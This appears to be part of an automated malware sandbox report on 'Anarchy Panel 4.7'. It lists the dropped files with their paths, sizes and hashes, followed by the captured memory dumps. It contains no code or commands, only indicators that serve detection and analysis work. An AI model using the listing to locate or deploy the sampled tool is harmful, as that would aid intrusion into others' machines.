315ddb7a49283efe7fcae1b51ebd6db77267d8df

SHA256
8b24823407924688ecafc771edd9c58c6dbcc7de252e7ebd20751a5b9dd7abef

SHA512
b3a62cb67c7fe44ca57ac16505a9e9c3712c470130df315b591a9d39b81934209c8b48b66e1e18da4a5323785120af2d9e236f39c9b98448f88adab097bc6651

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42482\base_library.zip
Filesize
1.3MB

MD5
630153ac2b37b16b8c5b0dbb69a3b9d6

SHA1
f901cd701fe081489b45d18157b4a15c83943d9d

SHA256
ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2

SHA512
7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42482\libffi-8.dll
Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42482\python312.dll
Filesize
1.8MB

MD5
cbd02b4c0cf69e5609c77dfd13fba7c4

SHA1
a3c8f6bfd7ffe0783157e41538b3955519f1e695

SHA256
ecef0ed97c7b249af3c56cde0bfcae70f66530d716b48b5d94621c3dba8236b5

SHA512
a3760ecaa9736eb24370a0a20dd22a1ee53b3f8002195947bc7d21b239278ec8e26bcc131d0132c530767d1de59954be7946dcf54fcbf2584052c9d9a5615567

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42482\ucrtbase.dll
Filesize
992KB

MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hettanob.sv1.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Anarchy Panel.exe
Filesize
57.4MB

MD5
d7bd62109241a0d8b6e4ce1471e98da0

SHA1
a356b7ed3edf66ccabfb7756d9c75dc5a2101b78

SHA256
4e8b57449fd47e32e919c406006664c677217b46eecff81f29f95f877e0a8523

SHA512
70d3b45fb9f331e39113f741bb0f92eec976ae827a3cc87e647a1fee9a63ac4c6f625e5918c6466024c56798a07f066fbfacc2709eb1652b89772d45098157b4

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Anarchy Panel.exe.config
Filesize
3KB

MD5
3d441f780367944d267e359e4786facd

SHA1
d3a4ba9ffc555bbc66207dfdaf3b2d569371f7b5

SHA256
49648bbe8ec16d572b125fff1f0e7faa19e1e8c315fd2a1055d6206860a960c9

SHA512
5f17ec093cdce3dbe2cb62fec264b3285aabe7352c1d65ec069ffbc8a17a9b684850fe38c1ffd8b0932199c820881d255c8d1e6000cbbe85587c98e88c9acb90

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\0guo3zbo66fqoG.dll
Filesize
78KB

MD5
e4ebcf76ff80ef398d3ab77d577f4c08

SHA1
cb9e6b30a63d50ae87610f6855b64abfb25691d2

SHA256
9661b1abc9a3e95e591c49c3838a64a066a2ff3c6de08d8aa7b541c4a75cd8e5

SHA512
8f37cedd987dd14181fdfa861b8a95271868dac21aa9df80bd6daa831ae20f4b4965c8be3e36f32aa220bd37ded11a7568ae237c9c9641bb4fc087f6fe104b01

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\59Zp7paEHDF7luJ.dll
Filesize
4.0MB

MD5
15e3d44d37439f3ac8574ac1c9789ec2

SHA1
bb3ef30e9f4496198f412738579966210ade36e0

SHA256
5db4c26057a05bb75ff7892fb60fd76620fc2228811d913d152a0aa4ec9db7a5

SHA512
ff358c9896792017ff7e91f1dedffd9d75a099c5b852da19599799aeca20b6b269267ff7c12c918a2530fe1a79a12bc8796c4eb3914c97faba3eba27388abde1

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\CjETR6GpGXqM.dll
Filesize
395KB

MD5
b0fc0ba80f8ec9586ff397412c512d9f

SHA1
0f6051b71b715a47be1fa16683201413905629a3

SHA256
13db80a0211ba9bf59a1e43bdb2fffa91de5c7f38bd469c4824b5e06245a0234

SHA512
222a365ae567c6c773ca2b99b82795916839cc5c9ba8eb019bf6713108720c2793303ef6612b64488f4584602cec84c0b48a02fe709db0250bf377d07e002d7d

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\EVa7gBMKoaHmLC.dll
Filesize
170KB

MD5
64a3d908b8a5feff2bccfc67f3a67dbd

SHA1
a17d7e5fa57c99a067cac459cb507b625dac254e

SHA256
6ea1ae7ab496666c0117fc20e704bfb6104b13cfb0408073a09689f863fa64b1

SHA512
66374d720230799bea6ac6cfe3faadc37fd775a49d40c04facae1caf1ec658956bbda54ba75287d7128b19b97971bd933a64469da8e0884225c5a8d8b9423ccc

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\FBSyChwp.dll
Filesize
170KB

MD5
0d41ccfaa8e7ef96248b8270d1a44d08

SHA1
6ee22bdb91d3a18e0b45b6590eb69bc9a0b02326

SHA256
0ea38d0d964815e2b84748a78bd5a829ae01586478e5f17b976f1ae763c8dec3

SHA512
a0f236f6dbeb1763fb1c198616de65b907a3a5edf7ed9435c2ad0b5826d84e9d2f25e96aba4e8b681ef495612cf0e04e929427a92d332164ace89e797bcb0e0e

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\G3nl0mDcABnDuZ.dll
Filesize
177KB

MD5
97b8bec4c47286e333cc2bedacf7338e

SHA1
764bbd0307924b71ca89538b42996208d10c9b91

SHA256
060d467cbeb0a58696287c052f3dd9b3597331b1c812e3e2882d6c232f8511de

SHA512
a40970622a594533349e75fc2022314ba21f05fc82709d6eaba82f4a2bc343c960029ad2825cfc034ce82622722127d149993bff88982f02d6dd6b5b1fb60fbf

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\KNTmoSnG.dll
Filesize
670KB

MD5
738c096a9bc38e21a9aa59ebc356c80d

SHA1
139756ad201a537461a6bb8524a4b89a63b1b1b9

SHA256
300a5551f7be89c5f03c0b70fa7dafb7f84c6394dac68bee95169e985e7786f0

SHA512
294c34f0716861fa67ba571bf7a8614613a1746e9f2935ba0c86eb1897dff858ea1f7fb44f1b6ec87cc709f4933a912dcd3eadd5d0b208c72985aa47e1f214f2

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\PK0TcnqTGFagQTS.dll
Filesize
174KB

MD5
fa90a2aee0d172000257c4faca31237c

SHA1
b317281b4acaaf1d7b7255c5e92887322abae892

SHA256
991fc53fa1aa7b5cd0b6e19dab536873d68e4413fd55b533601a3a2582d38a49

SHA512
b05c0b52e011089258ad31dd23a1f8a0cc8145b202e42e2a9d4fdf892c12d4a7b5843cc7721041295ab796e8bc98747b9e321c4e54bfd1a7c9a02dd2796fc405

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\RssCnLKcGRxj.dll
Filesize
181KB

MD5
f6808c4fbbe0275db03b2cc5b4c2bc0d

SHA1
e40b61c64c68f72fc5144f5057d54229babdecf8

SHA256
e204d15f0e7269d364157aaab265a5dfbe7e76c9f6202bf90998f0edd77ca248

SHA512
f077c49f6943d0e40799b3b42d1e11f50dabca48305c36ef2acd3258c990e0e0f982fbb0c27b1243aa15d2ed7b398b70f07dddc9ba76ff032ba74a24c8e08fb4

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\WkUP83aP9CABpi.dll
Filesize
86KB

MD5
8dbfb67c059aa59f7c53e20ef6740363

SHA1
3de96e7f48ee7647f5a7c2efb68cbd914bc78364

SHA256
a74b74f463d567c1f0505bddcd49ed23700f9ab7dcf4b7f46435723258c5a7e2

SHA512
70aed01375416e2be63d676bbdba58c12ba5f50d406d1fe252e7a66b901d32e0705007dbf465193de51663174c1b53bdb980890d8b2e6ce641dd16a200e3440d

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\eMTYbTz0gueNs4.dll
Filesize
1.1MB

MD5
5dfbcfbbf9e2ae7db23e252808699ffb

SHA1
a1d429292fe73aeb5abab10304e1ae8c1262b26d

SHA256
929e5f15e9ceca03c80b2d174283cb25bf47adfe4693f5c01f622416c9f6d03c

SHA512
9ee63080781577e0d818a27d026024f96161bb7b132dc0c130fabbe2d6c3b7758868fff5a4ad68efeb4d08f964e2f69417022751880a443f7f920aa4f40f5c09

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\fzAgyDYa.dll
Filesize
79KB

MD5
a5770798b7a6465f5b5a8c19d7d707ee

SHA1
ca67e9591d2f757cbbfacb55f27aec6485b10ee6

SHA256
f855353a618af8a53504b5188c05d3a09fb1ff85763e0cd15c53dee82d7c6119

SHA512
64da7687e83c6ff4d1c1cdc644ffff53333f745e82f169beb529d55ec5be6f21658d27c6e01744147c00f834978260e86ea627a5f2981f27305afb69a7b467dc

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\mGWHaG2Jn.dll
Filesize
81KB

MD5
8f98206f577160f950d456d1190c8d32

SHA1
defced38fce00775c4616b420fa674d77f946eff

SHA256
2bde0293c982fb6266c683ecaa2c90372d26d9a2786726874a2cfb89dcc68324

SHA512
432c2b6759701754616273633c966332e718dbb10a9a7eab0d7c57ffdc9be95b5e1b16b6e291301ac7aa6d1de48a46d30f08729e45d6634b1849f41c78e92d91

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\mML6WKMqdxjDGA.dll
Filesize
173KB

MD5
e03b206eec8a7efbd1a47909071226e5

SHA1
21163989ea524920e874bc7932adfcd5e94f854e

SHA256
778877431354a9584325dadb663be077f757227eaae8bcad33e4bf26efd6b965

SHA512
831ed74419f1b4c3250fbff20be16ed7058a851d7168a17e8a4dcf284a19412feee42a8c198af34b37571de33a80c48ac855f5d018ea9e2cfdcd846b832155ff

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\oYsKwDG.dll
Filesize
4.8MB

MD5
a718955297276f2349b7644447736e08

SHA1
377388d115b77aff357dcaf92b6aeb6286b1460d

SHA256
54ec206c8fe8ff27b3fb02ef892b8e6bc4b6abfff2fe08f5f57175c64f1d3220

SHA512
a3c2ded0cdc4e62adac92a569d6cd4db0c3647e663700f019a9de27e738eb2672e5cccec19af15633a3cd25a882452ff5ce39c17f67dc3ed6653b9e0ad063641

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\rNXXgmX25s.dll
Filesize
1.5MB

MD5
050f07b46987eaf152aab521c0112fc4

SHA1
2d2c0943ce9c10ba09b0d5cca54c2a88a1e61e95

SHA256
b93374fdfd9af786ff20597ae0e242b81373984ba5718194f9e57feb231c52cf

SHA512
a27c370e40ec126b6b9f3ab7d603378c2b629ec752aa8fc57a10e3ef58c0b701a5d1b4903a17ba180c4e73e76b54304f0868c474eb60e671562d0deed83a18c8

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\sJ88z8tsg5XzK.dll
Filesize
172KB

MD5
b3fa2c3d50057ddd2c9579dc0aef1590

SHA1
88a1f57b9177c95a2e095866574639b09d5f310a

SHA256
6eaf5744b8ec91312e1c6be83d852627e5204b3b64a1932e60e47438d73fb6bf

SHA512
0d1b8288cbc1c206029fe2f9b7366b2f8b49158e4c9643e453111ceb90fd77af903533c64f6ede351755414c9e7daa926704cda6f1953be79e1adc7aff515508

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\yL9x34D8X3oO2P.dll
Filesize
180KB

MD5
38502e61cc1d39095a12c1883551ad9f

SHA1
135c9cad9e6d54bf66a1cee5c99ba510102623b0

SHA256
0e9733277eac197c4eaf40fb0eada0907388222ef21843488a8e591149768301

SHA512
cd67a63ea954a4db8c8dfadceb2822b447d98c2c43a8f9c6901d0fce3230605a0416395b92caea6ac08348d5f6b0e1cb052b24cf90829602b0a5b0652b8a2600

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\zVvPGvK64uLS.dll
Filesize
106KB

MD5
a267a675b7243d9152c7b8e3e261d64c

SHA1
9a0277095646e2a773e8a04a7913ce6a56cf05b5

SHA256
9e82bf869638f8118f47f3870b1382401e42912cefcc6a9890489af5bb805c7e

SHA512
0dae32c0c0fbf6918779a5e9699cbef27572458a5cdc7119298abddb6a597a0017fe33af06c02abe0c66f3cd490f6955bd7c65470ed3e31338d28575306c04bb

Download Submit
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\zVvPGvK64uLS1.dll
Filesize
234KB

MD5
4f2fb621cbea3cafb7a041c9b3c115a7

SHA1
137502326e0126f372586d157e51a1416146c3be

SHA256
98eb518c9785f988ab1dc0752e0ef6d23f171134e60187c621795d6877940f99

SHA512
22171b9ecf1fc99b7aaf4e73c4d164cedcb503e83021f36a9cec673ff327f83a6c7568e22a7329cc6fc7ef3d6ff79d5dc6c88a8784e58401b884920c5ba2ac9b

Download Submit
memory/2092-37-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-44-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-38-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-61-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-65-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-39-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-67-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-66-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-64-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-62-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-63-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-60-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-59-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-56-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-57-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-58-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-55-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-54-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-53-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-45-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-49-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-52-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-51-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-50-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-48-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-47-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-46-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-42-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-43-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-40-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2092-41-0x000002D91A9C0000-0x000002D91A9D0000-memory.dmp

Filesize
64KB

Download
memory/2580-302-0x00007FF96E030000-0x00007FF96E0FD000-memory.dmp

Filesize
820KB

Download
memory/2580-284-0x00007FF975E70000-0x00007FF975E95000-memory.dmp

Filesize
148KB

Download
memory/2580-299-0x00007FF975630000-0x00007FF975649000-memory.dmp

Filesize
100KB

Download
memory/2580-251-0x00007FF96AD00000-0x00007FF96B3D9000-memory.dmp

Filesize
6.8MB

Download
memory/2580-300-0x00007FF9853C0000-0x00007FF9853CD000-memory.dmp

Filesize
52KB

Download
memory/2580-305-0x00007FF975360000-0x00007FF975374000-memory.dmp

Filesize
80KB

Download
memory/2580-295-0x00007FF9756A0000-0x00007FF9756CD000-memory.dmp

Filesize
180KB

Download
memory/2580-298-0x00007FF96D070000-0x00007FF96D1E6000-memory.dmp

Filesize
1.5MB

Download
memory/2580-301-0x00007FF9755F0000-0x00007FF975623000-memory.dmp

Filesize
204KB

Download
memory/2580-296-0x00007FF975680000-0x00007FF975699000-memory.dmp

Filesize
100KB

Download
memory/2580-306-0x00007FF984A00000-0x00007FF984A0D000-memory.dmp

Filesize
52KB

Download
memory/2580-285-0x00007FF988650000-0x00007FF98865F000-memory.dmp

Filesize
60KB

Download
memory/2580-297-0x00007FF975650000-0x00007FF975674000-memory.dmp

Filesize
144KB

Download
memory/2580-303-0x00007FF96A7D0000-0x00007FF96ACF9000-memory.dmp

Filesize
5.2MB

Download
memory/2580-304-0x0000015D89DF0000-0x0000015D8A319000-memory.dmp

Filesize
5.2MB

Download
memory/2580-307-0x00007FF96C840000-0x00007FF96C95B000-memory.dmp

Filesize
1.1MB

Download
memory/2728-152-0x00000000006F0000-0x0000000004050000-memory.dmp

Filesize
57.4MB

Download
memory/3224-385-0x000001A1A5700000-0x000001A1A5722000-memory.dmp

Filesize
136KB

Download
memory/4436-33-0x00000226B2A60000-0x00000226B2A68000-memory.dmp

Filesize
32KB

Download
memory/4436-16-0x00000226AE580000-0x00000226AE590000-memory.dmp

Filesize
64KB

Download
memory/4436-1-0x00000226AE480000-0x00000226AE490000-memory.dmp

Filesize
64KB

Download
memory/5004-310-0x0000000000AA0000-0x000000000413E000-memory.dmp

Filesize
54.6MB

Download